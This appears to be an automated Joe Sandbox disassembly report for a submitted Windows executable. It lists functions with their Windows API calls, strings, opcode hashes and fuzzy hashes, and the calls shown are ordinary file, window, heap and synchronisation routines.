                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: fb0ccda481be76595e7ed3504202fa8b6771d9706a886860360426f3f7fbb4ea
                                                    • Instruction ID: a16c79a55e317ce48a1b975cbda2e016dc3f090f2f6eb5b70de13ca44016053f
                                                    • Opcode Fuzzy Hash: fb0ccda481be76595e7ed3504202fa8b6771d9706a886860360426f3f7fbb4ea
                                                    • Instruction Fuzzy Hash: 7501F732209B325EA7282B74BC89A277F69FF737B4B200329F610972E0FF115C045988
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B1120 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 244fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcsrchr.LIBVCRUNTIME ref: 004B1154
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • DeleteFileW.KERNEL32(?), ref: 004B11FA
                                                    • _wcsrchr.LIBVCRUNTIME ref: 004B1269
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 004B132F
                                                      • Part of subcall function 00470270: LoadStringW.USER32(000000A1,?,00000514,D13B3340), ref: 004701D6
                                                    Strings
                                                    • --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 004B11AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DeleteFileInit_thread_footer_wcsrchr$HeapLoadProcessString
                                                    • String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
                                                    • API String ID: 2702461799-3685554107
                                                    • Opcode ID: a49db74d529a1556c347024470678718233a1b9905dbf4b6d5385e2b268edcd4
                                                    • Instruction ID: 6a4249d45cf238a2f7d94059e57e7a4fbeb6435f1e3a22e3b113f2ffcc3aad87
                                                    • Opcode Fuzzy Hash: a49db74d529a1556c347024470678718233a1b9905dbf4b6d5385e2b268edcd4
                                                    • Instruction Fuzzy Hash: C1919131A006059FDB00DF68C858B9EBBF5FF55325F14829AE815DB3A2EB35D904CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00386760 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 182windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,SysTabControl32,?,46010000,?,?,?,?,00000000,00000309,00000000), ref: 0038685D
                                                    • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00386872
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 0038687A
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 003884B0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003884FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$AllocateCreateHeapWindow
                                                    • String ID: SysTabControl32$TabHost
                                                    • API String ID: 2359350451-2872506973
                                                    • Opcode ID: 8cfe0538c0190a8193f0647d1352b9be1195f21f3bd2a5119c9da010ef3adc2c
                                                    • Instruction ID: cecd02885973cb2eacf57fcfd00d137f9d4d3c7d6d9a8cdf4f0824adb33439cc
                                                    • Opcode Fuzzy Hash: 8cfe0538c0190a8193f0647d1352b9be1195f21f3bd2a5119c9da010ef3adc2c
                                                    • Instruction Fuzzy Hash: FA51BD31A00605AFDB10DF68C845BAABBF5FF49310F104669F805AB3A0DB34A904CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A0D30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 172COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,D13B3340,76B25870,00000000), ref: 004A0D82
                                                    • CloseHandle.KERNEL32(?,D13B3340,00000000,?,00000000,00592143,000000FF,?), ref: 004A0F00
                                                    • CloseHandle.KERNEL32(00000000,D13B3340,00000000,?,00000000,00592143,000000FF,?), ref: 004A0F2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$FileModuleName
                                                    • String ID: <3[$LOG
                                                    • API String ID: 3884789274-4127936693
                                                    • Opcode ID: 9418a78490da8f38d52e0cb0a7abfd1d936e8d7a6b7f1c589c3fdefb984bc86c
                                                    • Instruction ID: 5d2aed45bd0d07a203479c0c6b18bd7ce73d7ebce5806c9bcc311b04c03f797a
                                                    • Opcode Fuzzy Hash: 9418a78490da8f38d52e0cb0a7abfd1d936e8d7a6b7f1c589c3fdefb984bc86c
                                                    • Instruction Fuzzy Hash: E051D271A003449FDB24DF68C809BABBBF5FF55710F144A2AE816DB790E778AA04C784
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046E070 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 0046E1F7
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0046E213
                                                    • GetExitCodeProcess.KERNEL32 ref: 0046E224
                                                    • CloseHandle.KERNEL32(00000000), ref: 0046E232
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                    • String ID: open
                                                    • API String ID: 2321548817-2758837156
                                                    • Opcode ID: c9d65f0364ef197a19eaff597e45eeadefe2f1c0192a56fa941e74e8eb135658
                                                    • Instruction ID: 0211963b45c90e3768c9ef21644230978b24cbb3f5e8dc308373cfe2f3b55888
                                                    • Opcode Fuzzy Hash: c9d65f0364ef197a19eaff597e45eeadefe2f1c0192a56fa941e74e8eb135658
                                                    • Instruction Fuzzy Hash: 7E617C75D006498FDB10CFA9C8487AEBBF5FF49324F14425AE824AB391EB789904DF81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00368AF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(0063E7BC,D13B3340,00000000,0063E7D8), ref: 00368B63
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00368BC8
                                                    • LoadCursorW.USER32(00350000,?), ref: 00368C24
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00368CBB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Leave$CursorEnterLoad
                                                    • String ID: ATL:%p
                                                    • API String ID: 2080323225-4171052921
                                                    • Opcode ID: e06a16b795282f8749a8600e67f5302b8db7c77248b60e1a23a4de25db97a57a
                                                    • Instruction ID: 0eefd9e035344440ab1fec87149e622a0d60c385172a73a08fbcde6fb280b063
                                                    • Opcode Fuzzy Hash: e06a16b795282f8749a8600e67f5302b8db7c77248b60e1a23a4de25db97a57a
                                                    • Instruction Fuzzy Hash: 8F51AC71D04B499BDB21CF69C9446AAFBF4FF18714F00861DE895A7690EB70B984CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96registrylibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,D13B3340,00000000,?,?,?,00000000,005483F0,000000FF), ref: 00458373
                                                    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0045839C
                                                    • RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,005483F0,000000FF), ref: 004583FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressCloseHandleModuleProc
                                                    • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                    • API String ID: 4190037839-2994018265
                                                    • Opcode ID: 5b53a44253c54e0f3e1c5ad598a2622f4926073b5a56d6e90755fd2399f0b6cb
                                                    • Instruction ID: e2374bd36e8f2601ebb82739d088e886359908c2061c35e9381f567b55613a70
                                                    • Opcode Fuzzy Hash: 5b53a44253c54e0f3e1c5ad598a2622f4926073b5a56d6e90755fd2399f0b6cb
                                                    • Instruction Fuzzy Hash: 4131A272604205EFEB248F44DC45FABBBA8FB48B51F10812AFD05E7281EF75A814CA94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00475640 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 0047569E
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004756A5
                                                    • __Init_thread_footer.LIBCMT ref: 004756BC
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$AddressConditionInit_thread_footerLibraryLoadProcVariableWake
                                                    • String ID: Dbghelp.dll$SymFromAddr
                                                    • API String ID: 3268644551-642441706
                                                    • Opcode ID: 9bd3114ad74221ca1029a23513533f4b63b0fc81078e74da78a2d3317bf294bf
                                                    • Instruction ID: 27fac6a03bc3908c6a77f3517cabb5c21ccceb01f14e5bb88912699d25941df4
                                                    • Opcode Fuzzy Hash: 9bd3114ad74221ca1029a23513533f4b63b0fc81078e74da78a2d3317bf294bf
                                                    • Instruction Fuzzy Hash: CD01BCB1A84745EFC710CF98EC46B15B7B6F719721F104629E929873E0DB76A800CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 005203FA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SleepConditionVariableCS.KERNELBASE(?,00520397,00000064), ref: 0052041D
                                                    • LeaveCriticalSection.KERNEL32(00637DCC,?,?,00520397,00000064,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340), ref: 00520427
                                                    • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00520397,00000064,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340), ref: 00520438
                                                    • EnterCriticalSection.KERNEL32(00637DCC,?,00520397,00000064,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340), ref: 0052043F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                    • String ID: `{5
                                                    • API String ID: 3269011525-770602540
                                                    • Opcode ID: cdf7dd672b1c7a2b7370f79e5a85c5f00350bebc9afbc1e9132c53b0f9e05a51
                                                    • Instruction ID: ef5e9e977142869495539256aa2ccd901dbb8fee7dd74011483325ae4260cd66
                                                    • Opcode Fuzzy Hash: cdf7dd672b1c7a2b7370f79e5a85c5f00350bebc9afbc1e9132c53b0f9e05a51
                                                    • Instruction Fuzzy Hash: 82E09231A45535ABCB212F40EC08ABE3F2AFF06B12B014020F60D521B1CBA11814ABD5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036B490 Relevance: 7.8, APIs: 5, Instructions: 269COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(0063946C,D13B3340,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0054C0C5), ref: 0036B4FA
                                                    • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0054C0C5), ref: 0036B57A
                                                    • EnterCriticalSection.KERNEL32(00639488,?,?,?,?,?,?,?,?,?,?,?,00000000,0054C0C5,000000FF), ref: 0036B733
                                                    • LeaveCriticalSection.KERNEL32(00639488,?,?,?,?,?,?,?,?,?,?,00000000,0054C0C5,000000FF), ref: 0036B754
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                    • String ID:
                                                    • API String ID: 1807155316-0
                                                    • Opcode ID: c2a9611d7cf35d997dce56fc180ceae41abb296cb23844b024f8c9d18b19c299
                                                    • Instruction ID: a97799979768d985ef0abf97a5e8c8d48bd951c4d256583b23fa838cb82b7562
                                                    • Opcode Fuzzy Hash: c2a9611d7cf35d997dce56fc180ceae41abb296cb23844b024f8c9d18b19c299
                                                    • Instruction Fuzzy Hash: 99B17074A00249DFDB11CFA4D888BAEFBB5BF49314F158059E805EB291DB75AD84CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046C3D0 Relevance: 7.7, APIs: 5, Instructions: 161fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,?), ref: 0046C4F4
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0046C501
                                                    • GetFileAttributesW.KERNEL32(?,?,?,005C8798,00000001,D13B3340,?,0000000A,00000000,00000000,00587E15,000000FF), ref: 0046C510
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0046C51D
                                                    • FindNextFileW.KERNEL32(?,?), ref: 0046C55B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$Attributes$FindNext
                                                    • String ID:
                                                    • API String ID: 3019667586-0
                                                    • Opcode ID: 77241f7b68638123a7e301a3e936ddfbb1c1c23cda72f9be02ec561e9d80f0f8
                                                    • Instruction ID: a2e382311421d4885b6ce406217c4a0b4688a6f6b7516df9722d886fef2bd6ca
                                                    • Opcode Fuzzy Hash: 77241f7b68638123a7e301a3e936ddfbb1c1c23cda72f9be02ec561e9d80f0f8
                                                    • Instruction Fuzzy Hash: E051B231500659ABDB24EF68CC94BFE77B4FF00310F14821AE8569B2E1EB38AD04CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00366140 Relevance: 7.6, APIs: 5, Instructions: 125windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ItemMessageSendWindow
                                                    • String ID:
                                                    • API String ID: 799199299-0
                                                    • Opcode ID: cef2ca02775773ab7bcea07c455d6e5d0fda5ca82dab98a62bab9d9ae3bb43e8
                                                    • Instruction ID: 1fb2e8b6208414b34bbbb6d8e1554d3456b1b9c18388327316d1804d62b4a1cc
                                                    • Opcode Fuzzy Hash: cef2ca02775773ab7bcea07c455d6e5d0fda5ca82dab98a62bab9d9ae3bb43e8
                                                    • Instruction Fuzzy Hash: DC41F232301201DFCB26CF55D8A9A76BBB9FB88391F04CD6AE546C7565C732E811DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00466B50 Relevance: 7.6, APIs: 5, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00466B84
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00466BA6
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00466BCE
                                                    • std::_Facet_Register.LIBCPMT ref: 00466CB7
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00466CE1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                    • String ID:
                                                    • API String ID: 459529453-0
                                                    • Opcode ID: 4b8fbe6bfeb29cd3540569d6f6abf353eaaf54d09e58f3fb39b91a551f5f81e1
                                                    • Instruction ID: ba090ebd6e446e593034ee735e7c6cb10681900dc9ca086da793b7836ac86e3f
                                                    • Opcode Fuzzy Hash: 4b8fbe6bfeb29cd3540569d6f6abf353eaaf54d09e58f3fb39b91a551f5f81e1
                                                    • Instruction Fuzzy Hash: E151B0B0900655DFDB11CF58C984BAEBBB4FB00714F24815ED846AB381E779AE45CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00360240 Relevance: 7.6, APIs: 5, Instructions: 60memorywindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0036028A
                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00360290
                                                    • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 003602B3
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00549B16,000000FF), ref: 003602DB
                                                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00549B16,000000FF), ref: 003602E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$FormatMessage
                                                    • String ID:
                                                    • API String ID: 1606019998-0
                                                    • Opcode ID: d8698f8415e48ef706b2050b74f9e890f138e3565e7293b3104399bf007c84f3
                                                    • Instruction ID: 3a09b277270c2a6a4af75fba8e87cb082c9801ca2c57bf3043b6a2eb00930068
                                                    • Opcode Fuzzy Hash: d8698f8415e48ef706b2050b74f9e890f138e3565e7293b3104399bf007c84f3
                                                    • Instruction Fuzzy Hash: 941163B0A44219ABEB10DF94DC0AFEFBBBCFB04B14F104515F510A72C1D7B66A048790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

